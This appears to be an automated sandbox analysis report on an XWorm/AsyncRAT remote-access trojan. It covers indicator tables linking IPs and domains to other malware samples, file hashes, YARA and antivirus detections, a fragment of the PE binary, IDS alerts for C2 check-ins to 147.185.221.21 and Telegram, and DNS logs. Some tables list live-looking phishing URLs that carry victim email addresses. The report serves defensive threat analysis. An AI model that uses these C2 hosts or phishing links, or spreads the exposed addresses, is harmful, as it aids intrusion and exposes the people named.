147.185.221.21 | sv6ieteV0j.exe | malicious | Njrat, PureLog Stealer | -
147.185.221.21 | setup.exe | malicious | RedLine | -
147.185.221.21 | setup.exe | malicious | RedLine | -
147.185.221.21 | 47up6MR64o.exe | malicious | Njrat | -
147.185.221.21 | RdJ73GU3N1.exe | malicious | Njrat | -
147.185.221.21 | python.exe | malicious | XWorm | -
147.185.221.21 | setup.exe | malicious | XWorm | -
147.185.221.21 | Avowed Beta.exe | malicious | XWorm | -
147.185.221.21 | nebula.exe | malicious | XWorm | -
147.185.221.21 | Server.exe | malicious | Njrat | -
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip-api.com | CTIPUPiILj.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
ip-api.com | Built.exe | malicious | Blank Grabber | 208.95.112.1
ip-api.com | JGKjBsQrMc.exe | malicious | Amadey, Babadeda, RedLine, Stealc, Vidar | 208.95.112.1
ip-api.com | LisectAVT_2403002A_1.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | LisectAVT_2403002A_147.exe | malicious | Blank Grabber | 208.95.112.1
ip-api.com | LisectAVT_2403002A_368.exe | malicious | Blank Grabber, DCRat, Umbral Stealer | 208.95.112.1
ip-api.com | LisectAVT_2403002A_473.exe | malicious | Njrat, XWorm | 208.95.112.1
ip-api.com | LisectAVT_2403002A_473.exe | malicious | Njrat, XWorm | 208.95.112.1
ip-api.com | LisectAVT_2403002A_52.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | LisectAVT_2403002B_109.exe | malicious | Blackshades | 208.95.112.1
api.telegram.org | zx.ps1 | malicious | Unknown | 149.154.167.220
api.telegram.org | new order 00041221.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | 7NeoZ6OBn2.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | 7NeoZ6OBn2.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | file.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | file.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | file.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | LisectAVT_2403002A_127.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | LisectAVT_2403002A_74.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | New Order.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | zx.ps1 | malicious | Unknown | 149.154.167.220
TELEGRAMRU | 1lKbb2hF7fYToopfpmEvlyRN.exe | malicious | LummaC, Vidar | 149.154.167.99
TELEGRAMRU | new order 00041221.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | 7NeoZ6OBn2.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | 7NeoZ6OBn2.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | fps-booster.exe | malicious | StormKitty | 149.154.167.99
TELEGRAMRU | file.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | file.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | file.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | http://jolly-figolla-4c9551.netlify.app/ | malicious | Unknown | 149.154.167.99
TUT-ASUS | CTIPUPiILj.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
TUT-ASUS | Built.exe | malicious | Blank Grabber | 208.95.112.1
TUT-ASUS | LisectAVT_2403002A_1.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | LisectAVT_2403002A_147.exe | malicious | Blank Grabber | 208.95.112.1
TUT-ASUS | LisectAVT_2403002A_368.exe | malicious | Blank Grabber, DCRat, Umbral Stealer | 208.95.112.1
TUT-ASUS | LisectAVT_2403002A_473.exe | malicious | Njrat, XWorm | 208.95.112.1
TUT-ASUS | LisectAVT_2403002A_473.exe | malicious | Njrat, XWorm | 208.95.112.1
TUT-ASUS | LisectAVT_2403002A_52.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | LisectAVT_2403002B_109.exe | malicious | Blackshades | 208.95.112.1
TUT-ASUS | LisectAVT_2403002B_253.exe | malicious | AgentTesla | 208.95.112.1
SALSGIVERUS | CTIPUPiILj.exe | malicious | AsyncRAT, XWorm | 147.185.221.20
SALSGIVERUS | LisectAVT_2403002A_135.exe | malicious | Njrat | 147.185.221.19
SALSGIVERUS | LisectAVT_2403002B_484.exe | malicious | AsyncRAT, DcRat | 147.185.221.19
SALSGIVERUS | LisectAVT_2403002B_484.exe | malicious | AsyncRAT, DcRat | 147.185.221.19
SALSGIVERUS | LisectAVT_2403002C_149.exe | malicious | AsyncRAT | 147.185.221.18
SALSGIVERUS | LisectAVT_2403002C_28.exe | malicious | Remcos | 147.185.221.18
SALSGIVERUS | sv6ieteV0j.exe | malicious | Njrat, PureLog Stealer | 147.185.221.21
SALSGIVERUS | Ym4vc47pgk.elf | malicious | Unknown | 147.184.134.179
SALSGIVERUS | Windows Defender.exe | malicious | XWorm | 147.185.221.20
SALSGIVERUS | setup.exe | malicious | RedLine | 147.185.221.21
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | zx.ps1 | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://b8le2c5j.r.us-east-2.awstrack.me/L0/https:%2F%2Fslivtovara.ru%2Fbitrix%2Fredirect.php%3Fevent1=click_to_call%26event2=%26event3=%26goto=https:%2F%2F7qrw.wanianten.com%2FGhGNAL8%2F%23Pamy@derick.com/1/010f0190ec251e7b-a039cc69-e4b5-46b3-9c67-bbe921a600f9-000000/LLZuw2OBV0eOHt3bnXuAzTOkJoc=169 | malicious | HTMLPhisher, Tycoon2FA | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://alamanaschool-my.sharepoint.com/:o:/g/personal/faridhajahan_kg_amanaschool_com/EjJ3Pc0GI4lCgL5xS_fmQD0Bn9XR0VtN5_yNafsBQyYJsg?e=OHPWmQ | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe | malicious | GuLoader, Remcos | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Win32.MalwareX-gen.31904.27419.exe | malicious | AgentTesla | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://fiffr-12d16.web.app | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Swift Copy.exe | malicious | AgentTesla | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://pendingdelivery864.s3.us-east.cloud-object-storage.appdomain.cloud/%2540%2523%2524%2525%255E%2526%2526()(%2526%2526%255E%255E%2525%2525%2524%2524%2524%2523%2523.html#nogueira@carboclor.com.ar | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | 6SoKuOqyNh.exe | malicious | Amadey, Babadeda, Stealc, Vidar | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Payment Advice__HSBC Banking.pdf.lnk | malicious | Remcos | 149.154.167.220
                                                                        No context
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:modified
                                                                        Size (bytes):64
                                                                        Entropy (8bit):0.34726597513537405
                                                                        Encrypted:false
                                                                        SSDEEP:3:Nlll:Nll
                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview:@...e...........................................................
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Users\user\Desktop\VJV2AjJ7Na.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Jul 26 18:22:53 2024, mtime=Fri Jul 26 18:22:53 2024, atime=Fri Jul 26 18:22:53 2024, length=71168, window=hide
                                                                        Category:modified
                                                                        Size (bytes):767
                                                                        Entropy (8bit):5.016504242302474
                                                                        Encrypted:false
                                                                        SSDEEP:12:8nwcwca24Qop0pnu8ChRlXIsY//l5lESLtqYslLjATE+HkLbCJcdmV:8wZvncDolXUdFcYEATEFLbC+dm
                                                                        MD5:61F1AA6BE069FFF4F47959E53D45B7AE
                                                                        SHA1:5F6E79C111584006C905048001CB618CE6EF8064
                                                                        SHA-256:4C39C92D6F43308E4E70B5CFD976CF755C67F7D9A24FF27BA9135E93DBE66885
                                                                        SHA-512:8442A839CD536AFFC5B3D71269AFA36778B169A5DDACBE03E5D9B8AD4BFCB6DF8F0CF39A51B24DE73448C954478DA41BCEFE9F84DABE75B41761BE35CA6C9948
                                                                        Malicious:false
                                                                        Preview:L..................F.... ...4.16....4.16....4.16............................v.:..DG..Yr?.D..U..k0.&...&.......$..S...........2.66........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.X.............................^.A.p.p.D.a.t.a...B.V.1......X....Roaming.@......EW<2.X....../.......................H.R.o.a.m.i.n.g.....b.2......X. .XClient.exe.H.......X..X.....)......................e.X.C.l.i.e.n.t...e.x.e.......\...............-.......[..................C:\Users\user\AppData\Roaming\XClient.exe........\.....\.....\.....\.....\.X.C.l.i.e.n.t...e.x.e.`.......X.......965969...........hT..CrF.f4... ..mDr.K...-...-$..hT..CrF.f4... ..mDr.K...-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                        Process:C:\Users\user\Desktop\VJV2AjJ7Na.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):71168
                                                                        Entropy (8bit):5.928240316671683
                                                                        Encrypted:false
                                                                        SSDEEP:1536:/Jyq1zgbszio2koAZnsuW8sLFbsnkRs6v6daV4IO8geup:/JT1zPziqoQsX8sLFbsH6R4IO8geup
                                                                        MD5:99088D7D8B409B4039B02295E64A686F
                                                                        SHA1:F58DAD3090854F8AB5CC3DE89D6CDAEB151883D4
                                                                        SHA-256:A9F1D82A7954D86D746086969C0D7B7B5CA65CCFD0D6A375931A6826ECA1A8C7
                                                                        SHA-512:A485B749F096A63BCC733B848317CECA918EE46516BCF17593C8358303A80AA0FB15C99B444FBEAC02F79AC69C165E8A2FBB614265A56D99B5C098BD48D388B7
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: ditekSHen
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 79%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....i.f.............................+... ...@....@.. ....................................@.................................4+..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p+......H.......`]..........&.....................................................(....*.r...p*. .G%.*..(....*.r{..p*. ...*.s.........s.........s.........s.........*.r...p*. ..g.*.r3..p*. ....*.r...p*. ~.H.*.r...p*. ....*.rG..p*. [.x.*..((...*.r...p*. .t..*.r\..p*. ....*.(,...-.(-...,.+.(....,.+.(+...,.+.(*...,..(]...*&(....&+.*.+5sj... .... .'..ok...(*...~....-.(_...(Q...~....ol...&.-.*.r...p*. ...*.r&..p*. .O..*.r...p*. ....*.r...p*. ....*.r:..p*. IWp.*.r...p*. .(T.*.r...p*. q...
                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):5.928240316671683
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        File name:VJV2AjJ7Na.exe
                                                                        File size:71'168 bytes
                                                                        MD5:99088d7d8b409b4039b02295e64a686f
                                                                        SHA1:f58dad3090854f8ab5cc3de89d6cdaeb151883d4
                                                                        SHA256:a9f1d82a7954d86d746086969c0d7b7b5ca65ccfd0d6a375931a6826eca1a8c7
                                                                        SHA512:a485b749f096a63bcc733b848317ceca918ee46516bcf17593c8358303a80aa0fb15c99b444fbeac02f79ac69c165e8a2fbb614265a56d99b5c098bd48d388b7
                                                                        SSDEEP:1536:/Jyq1zgbszio2koAZnsuW8sLFbsnkRs6v6daV4IO8geup:/JT1zPziqoQsX8sLFbsH6R4IO8geup
                                                                        TLSH:AF636A187BE94025F1FF9FB55DE17266CA79B3236803D61F54C9028B1A23A85CC817F6
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....i.f.............................+... ...@....@.. ....................................@................................
                                                                        Icon Hash:00928e8e8686b000
                                                                        Entrypoint:0x412b8e
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x66A36988 [Fri Jul 26 09:16:56 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
                                                                        add byte ptr [eax], al
                                                                         Name | Virtual Address | Virtual Size | Is in Section
                                                                         IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_IMPORT | 0x12b34 | 0x57 | .text
                                                                         IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x14000 | 0x4ce | .rsrc
                                                                         IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x16000 | 0xc | .reloc
                                                                         IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                                         IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                                         IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x10b94 | 0x10c00 | 0d48cdd565a4710712d69e162bf0226a | False | 0.6010815065298507 | data | 6.003794116366673 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x14000 | 0x4ce | 0x600 | f9052177c59fad11b6e11866b69a673f | False | 0.375 | data | 3.726864092899557 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x16000 | 0xc | 0x200 | bcf16d11098960ba96cc952f19bc273c | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x140a0 | 0x244 | data | | | 0.4724137931034483
RT_MANIFEST | 0x142e4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041

DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-26T21:23:22.379211+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 30970 | 49720 | 147.185.221.21 | 192.168.2.6
2024-07-26T21:22:55.160186+0200 | TCP | 2012510 | ET SHELLCODE UTF-8/16 Encoded Shellcode | 443 | 49719 | 149.154.167.220 | 192.168.2.6
2024-07-26T21:22:55.159601+0200 | TCP | 2853685 | ETPRO MALWARE Win32/XWorm Checkin via Telegram | 49719 | 443 | 192.168.2.6 | 149.154.167.220
2024-07-26T21:22:51.830728+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49718 | 13.85.23.86 | 192.168.2.6
2024-07-26T21:23:16.474992+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 30970 | 49720 | 147.185.221.21 | 192.168.2.6
2024-07-26T21:24:00.825159+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 30970 | 49720 | 147.185.221.21 | 192.168.2.6
2024-07-26T21:24:01.270266+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49720 | 30970 | 192.168.2.6 | 147.185.221.21
2024-07-26T21:22:14.312906+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49713 | 20.114.59.183 | 192.168.2.6
2024-07-26T21:23:09.044405+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 30970 | 49720 | 147.185.221.21 | 192.168.2.6
2024-07-26T21:24:01.268441+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 30970 | 49720 | 147.185.221.21 | 192.168.2.6
2024-07-26T21:23:09.092721+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49720 | 30970 | 192.168.2.6 | 147.185.221.21
2024-07-26T21:23:22.381102+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49720 | 30970 | 192.168.2.6 | 147.185.221.21
2024-07-26T21:23:35.706366+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49720 | 30970 | 192.168.2.6 | 147.185.221.21
2024-07-26T21:23:49.131894+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 30970 | 49720 | 147.185.221.21 | 192.168.2.6
2024-07-26T21:24:06.033582+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 30970 | 49720 | 147.185.221.21 | 192.168.2.6
2024-07-26T21:23:59.832923+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 30970 | 49720 | 147.185.221.21 | 192.168.2.6
2024-07-26T21:23:59.835128+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49720 | 30970 | 192.168.2.6 | 147.185.221.21
2024-07-26T21:23:46.482216+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 30970 | 49720 | 147.185.221.21 | 192.168.2.6
2024-07-26T21:24:00.826655+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49720 | 30970 | 192.168.2.6 | 147.185.221.21
2024-07-26T21:23:35.704548+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 30970 | 49720 | 147.185.221.21 | 192.168.2.6
2024-07-26T21:24:06.034293+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49720 | 30970 | 192.168.2.6 | 147.185.221.21
2024-07-26T21:23:49.134083+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49720 | 30970 | 192.168.2.6 | 147.185.221.21
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 26, 2024 21:21:59.851650000 CEST | 192.168.2.6 | 1.1.1.1 | 0xb86d | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Jul 26, 2024 21:22:54.090760946 CEST | 192.168.2.6 | 1.1.1.1 | 0xc97b | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Jul 26, 2024 21:22:55.279386997 CEST | 192.168.2.6 | 1.1.1.1 | 0xa167 | Standard query (0) | main-although.gl.at.ply.gg | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 26, 2024 21:21:59.860373020 CEST | 1.1.1.1 | 192.168.2.6 | 0xb86d | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
